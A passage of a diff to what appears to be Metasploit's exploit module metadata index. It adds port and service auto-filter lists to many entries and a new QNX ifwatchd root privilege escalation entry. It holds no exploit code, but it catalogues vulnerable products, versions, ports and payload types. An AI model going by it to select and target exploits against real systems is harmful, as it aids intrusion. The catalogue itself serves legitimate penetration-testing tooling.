"php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vTigerCRM v5.4.0" ], @@ -50478,6 +67217,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "WebNMS Framework Server 5.2 / 5.2 SP1 - Linux", @@ -50513,6 +67267,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebPageTest v2.6 or older" ], @@ -50544,6 +67313,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "werkzeug 0.10 and older" ], @@ -50578,6 +67362,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WikkaWiki 1.3.2 r1814" ], @@ -50599,7 +67398,7 @@ "type": "exploit", "author": [ "James Golovich", - "Rob Carr " + "rastating" ], "description": "Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain\n an unauthenticated file upload vulnerability, allowing guests\n to upload arbitrary PHP code that can be executed in the context\n of the web server.", "references": [ @@ -50612,10 +67411,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ninja-forms" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb", "is_install_path": true, "ref_name": "multi/http/wp_ninja_forms_unauthenticated_file_upload", @@ -50644,6 +67458,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Responsive Thumbnail Slider Plugin v1.0" ], @@ -50678,6 +67507,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -50710,6 +67554,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50745,6 +67604,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "zemra panel / Unix", "zemra panel / Windows" @@ -50779,6 +67653,21 @@ "platform": "Java", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Novell ZCM < v11.3.2 - Universal Java" ], @@ -50815,6 +67704,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2", "ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3" @@ -50855,6 +67759,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -50894,6 +67813,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 139, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal", "Redhat 8" @@ -50930,6 +67855,12 @@ "platform": "Android,Linux", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -50967,6 +67898,12 @@ "platform": "Linux,Solaris", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Solaris", @@ -51002,6 +67939,12 @@ "platform": "", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -51037,6 +67980,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -51075,6 +68024,12 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 4750, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows/VBS Stager", @@ -51112,6 +68067,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 3333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target", "Linux", @@ -51146,6 +68107,12 @@ "platform": "", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux 64 bits / HP Data Protector 9", "Windows 64 bits / HP Data Protector 9" @@ -51184,6 +68151,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 13838, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP VSA up to 8.5", @@ -51219,6 +68192,21 @@ "platform": "OSX,Windows", "arch": "", "rport": 12345, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Indesign CS6 Server / Windows (64 bits)", "Indesign CS6 Server / Mac OS X Snow Leopard 64 bits" @@ -51259,6 +68247,12 @@ "platform": "Linux,OSX,Windows", "arch": "armle, aarch64, x86, x64", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux (Native Payload)", "OSX (Native Payload)", @@ -51295,6 +68289,114 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": [ + 999, + 1090, + 1098, + 1099, + 1100, + 1101, + 1102, + 1103, + 1129, + 1030, + 1035, + 1199, + 1234, + 1440, + 3273, + 3333, + 3900, + 2199, + 2809, + 5520, + 5580, + 5521, + 5999, + 6060, + 6789, + 6996, + 7700, + 7800, + 7878, + 7890, + 7801, + 8050, + 8051, + 8085, + 8091, + 8205, + 8303, + 8642, + 8701, + 8686, + 8888, + 8889, + 8890, + 8901, + 8902, + 8903, + 8999, + 9001, + 9003, + 9004, + 9005, + 9050, + 9090, + 9099, + 9300, + 9500, + 9711, + 9809, + 9810, + 9811, + 9812, + 9813, + 9814, + 9815, + 9875, + 9910, + 9991, + 9999, + 10001, + 10162, + 10098, + 10099, + 11001, + 11099, + 11333, + 12000, + 13013, + 14000, + 15000, + 15001, + 15200, + 16000, + 17200, + 18980, + 20000, + 23791, + 26256, + 31099, + 33000, + 32913, + 37718, + 45230, + 47001, + 47002, + 50050, + 50500, + 50501, + 50502, + 50503, + 50504 + ], + "autofilter_services": [ + "rmi", + "rmid", + "java-rmi", + "rmiregistry" + ], "targets": [ "Generic (Java Payload)" ], @@ -51328,6 +68430,114 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": 1099, + "autofilter_ports": [ + 999, + 1090, + 1098, + 1099, + 1100, + 1101, + 1102, + 1103, + 1129, + 1030, + 1035, + 1199, + 1234, + 1440, + 3273, + 3333, + 3900, + 2199, + 2809, + 5520, + 5580, + 5521, + 5999, + 6060, + 6789, + 6996, + 7700, + 7800, + 7878, + 7890, + 7801, + 8050, + 8051, + 8085, + 8091, + 8205, + 8303, + 8642, + 8701, + 8686, + 8888, + 8889, + 8890, + 8901, + 8902, + 8903, + 8999, + 9001, + 9003, + 9004, + 9005, + 9050, + 9090, + 9099, + 9300, + 9500, + 9711, + 9809, + 9810, + 9811, + 9812, + 9813, + 9814, + 9815, + 9875, + 9910, + 9991, + 9999, + 10001, + 10162, + 10098, + 10099, + 11001, + 11099, + 11333, + 12000, + 13013, + 14000, + 15000, + 15001, + 15200, + 16000, + 17200, + 18980, + 20000, + 23791, + 26256, + 31099, + 33000, + 32913, + 37718, + 45230, + 47001, + 47002, + 50050, + 50500, + 50501, + 50502, + 50503, + 50504 + ], + "autofilter_services": [ + "rmi", + "rmid", + "java-rmi", + "rmiregistry" + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -51366,6 +68576,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Legend IRC Bot" ], @@ -51398,6 +68614,12 @@ "platform": "Ruby,Unix,Windows", "arch": "", "rport": 55552, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ruby", "Windows CMD", @@ -51431,6 +68653,12 @@ "platform": "Ruby", "arch": "ruby", "rport": 55554, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -51463,6 +68691,12 @@ "platform": "", "arch": "", "rport": 5858, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NodeJS" ], @@ -51494,6 +68728,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apache OpenOffice on Windows (PSH)", "Apache OpenOffice on Linux/OSX (Python)" @@ -51530,6 +68770,12 @@ "platform": "Unix", "arch": "cmd", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix", "Windows" @@ -51562,6 +68808,12 @@ "platform": "Linux,Windows", "arch": "armle, aarch64, x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux (Bash Payload)", "Windows (Powershell Payload)" @@ -51599,6 +68851,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "pbot" ], @@ -51633,6 +68891,12 @@ "platform": "Unix,Windows", "arch": "", "rport": 3465, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Client Automation 9.0.0 / Linux", "HP Client Automation 9.0.0 / Windows" @@ -51668,6 +68932,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ra1NX / Unix", "Ra1NX / Windows" @@ -51702,6 +68972,12 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -51734,6 +69010,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "w3tw0rk" ], @@ -51767,6 +69049,12 @@ "platform": "", "arch": "", "rport": 7001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix", "Windows" @@ -51805,6 +69093,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": 921, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", @@ -51847,6 +69141,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": 921, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", "wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", @@ -51886,6 +69186,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xdh Botnet / LinuxNet perlbot" ], @@ -51919,6 +69225,12 @@ "platform": "Java", "arch": "java", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux", "Windows" @@ -51953,6 +69265,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -51988,6 +69306,12 @@ "platform": "Linux", "arch": "x86", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RedHat Linux 7.0 ntpd 4.0.99j", "RedHat Linux 7.0 ntpd 4.0.99j w/debug", @@ -52026,6 +69350,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Linux x86 Generic", @@ -52070,6 +69409,12 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "cmd", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Automatic" ], @@ -52102,6 +69447,21 @@ "platform": "BSD,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -52136,6 +69496,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x Linux x86" ], @@ -52171,6 +69539,14 @@ "platform": "Unix", "arch": "cmd", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -52203,6 +69579,22 @@ "platform": "Linux,Windows", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows Universal" @@ -52236,6 +69628,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows x64" @@ -52270,6 +69677,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows x64" @@ -52311,6 +69733,12 @@ "platform": "PHP,Python,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Python", "PHP", @@ -52347,6 +69775,12 @@ "platform": "Linux,OSX,Python", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64", @@ -52389,6 +69823,12 @@ "platform": "BSD,Linux", "arch": "x86", "rport": 3690, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux Bruteforce", @@ -52428,6 +69868,12 @@ "platform": "Unix", "arch": "cmd", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", @@ -52462,6 +69908,12 @@ "platform": "Unix,Windows", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VNC Windows / Powershell", "VNC Windows / VBScript CMDStager", @@ -52500,6 +69952,12 @@ "platform": "", "arch": "", "rport": 655, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP x86, tinc 1.1.pre6 (exe installer)", "Windows 7 x86, tinc 1.1.pre6 (exe installer)", @@ -52547,6 +70005,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XPe x86", "Wyse Linux x86" @@ -52580,6 +70044,14 @@ "platform": "Netware", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "VMware", @@ -52620,6 +70092,12 @@ "platform": "Netware", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "NetWare 6.5 SP2", @@ -52660,6 +70138,12 @@ "platform": "OSX", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.3.3" ], @@ -52693,6 +70177,12 @@ "platform": "OSX", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Arkeia 5.3.1 Stack Return (boot)" ], @@ -52729,6 +70219,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)" ], @@ -52764,6 +70260,12 @@ "platform": "Java,OSX,Unix", "arch": "cmd, java", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Safari 5.1 on OS X", "Safari 5.1 on OS X with Java" @@ -52798,6 +70300,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -52830,6 +70338,12 @@ "platform": "OSX,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X" ], @@ -52861,6 +70375,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X x86 (Native Payload)", "Mac OS X x64 (Native Payload)" @@ -52894,6 +70414,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -52930,6 +70456,18 @@ "platform": "OSX,Unix", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Mail.app - Command Payloads", @@ -52967,6 +70505,13 @@ "platform": "OSX", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Mac OS X 10.3.4-10.3.6" ], @@ -53001,6 +70546,12 @@ "platform": "OSX", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.5.8 x86, EvoCam 3.6.6", "Mac OS X 10.5.8 x86, EvoCam 3.6.7" @@ -53036,6 +70587,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.10-10.10.4" ], @@ -53071,6 +70628,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9.5 Mavericks x64 (Native Payload)" ], @@ -53103,6 +70666,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.7 Lion x64 (Native Payload)" ], @@ -53135,6 +70704,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X" ], @@ -53171,6 +70746,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.13.1 High Sierra x64 (Native Payload)" ], @@ -53207,6 +70788,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9-10.10.2" ], @@ -53240,6 +70827,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9-10.10.3" ], @@ -53273,6 +70866,12 @@ "platform": "OSX,Python", "arch": "x64, python", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9.5-10.10.5" ], @@ -53308,6 +70907,12 @@ "platform": "OSX", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Tunnelblick 3.2.8 / Mac OS X x86", "Tunnelblick 3.2.8 / Mac OS X x64" @@ -53344,6 +70949,12 @@ "platform": "OSX", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Viscosity 1.4.1 / Mac OS X x86", "Viscosity 1.4.1 / Mac OS X x64" @@ -53381,6 +70992,12 @@ "platform": "OSX", "arch": "x86, x64, cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X x86 (Native Payload)", "Mac OS X x64 (Native Payload)", @@ -53415,6 +71032,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.10.4-10.10.5" ], @@ -53452,6 +71075,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9 Mavericks x64 (Native Payload)" ], @@ -53489,6 +71118,12 @@ "platform": "OSX", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "10.4.8 x86", "10.4.0 PPC" @@ -53523,6 +71158,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.5.8 x86, UFOAI 2.2.1" ], @@ -53556,6 +71197,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0", "Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1", @@ -53593,6 +71240,14 @@ "platform": "OSX", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "Mac OS X 10.4.x x86 Samba 3.0.10", @@ -53631,6 +71286,14 @@ "platform": "OSX", "arch": "ppc", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -53644,6 +71307,48 @@ "notes": { } }, + "exploit_qnx/local/ifwatchd_priv_esc": { + "name": "ifwatchd Privilege Escalation", + "full_name": "exploit/qnx/local/ifwatchd_priv_esc", + "rank": 600, + "disclosure_date": "2014-03-10", + "type": "exploit", + "author": [ + "cenobyte", + "Tim Brown", + "Brendan Coles" + ], + "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).", + "references": [ + "CVE-2014-2533", + "BID-66449", + "EDB-32153", + "URL-http://seclists.org/bugtraq/2014/Mar/66" + ], + "is_server": true, + "is_client": false, + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-10-06 04:37:04 +0000", + "path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb", + "is_install_path": true, + "ref_name": "qnx/local/ifwatchd_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_solaris/dtspcd/heap_noir": { "name": "Solaris dtspcd Heap Overflow", "full_name": "exploit/solaris/dtspcd/heap_noir", @@ -53667,6 +71372,12 @@ "platform": "Solaris", "arch": "sparc", "rport": 6112, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Solaris 8" ], @@ -53704,6 +71415,12 @@ "platform": "Solaris,Unix", "arch": "x86, x64, sparc", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -53749,6 +71466,12 @@ "platform": "Solaris", "arch": "x86, x64, sparc", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -53783,6 +71506,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -53817,6 +71546,14 @@ "platform": "Solaris", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Solaris 8/9/10 x86 Samba 3.0.21-3.0.24", "Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24", @@ -53854,6 +71591,14 @@ "platform": "Solaris", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce", "Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce" @@ -53889,6 +71634,12 @@ "platform": "Solaris", "arch": "x86", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sun Solaris 9 x86 Brute Force", "Sun Solaris 9 x86", @@ -53927,6 +71678,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -53960,6 +71717,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -53993,6 +71756,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54027,6 +71796,12 @@ "platform": "Solaris,Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54065,6 +71840,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54107,6 +71888,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -54146,6 +71933,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EPS file" ], @@ -54184,20 +71977,25 @@ "URL-https://seclists.org/oss-sec/2016/q3/682", "URL-https://github.com/ImageMagick/ImageMagick/commit/06c41ab", "URL-https://github.com/ImageMagick/ImageMagick/commit/a347456", - "URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669", - "AKA-ImageTragick" + "URL-http://permalink.gmane.org/gmane.comp.security.oss.general/19669" ], "is_server": true, "is_client": false, "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SVG file", "MVG file", "PS file" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/unix/fileformat/imagemagick_delegate.rb", "is_install_path": true, "ref_name": "unix/fileformat/imagemagick_delegate", @@ -54205,6 +72003,9 @@ "post_auth": false, "default_credential": false, "notes": { + "AKA": [ + "ImageTragick" + ] } }, "exploit_unix/ftp/proftpd_133c_backdoor": { @@ -54227,6 +72028,13 @@ "platform": "Unix", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic" ], @@ -54260,6 +72068,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProFTPD 1.3.5" ], @@ -54294,6 +72117,12 @@ "platform": "Unix", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -54327,6 +72156,12 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + 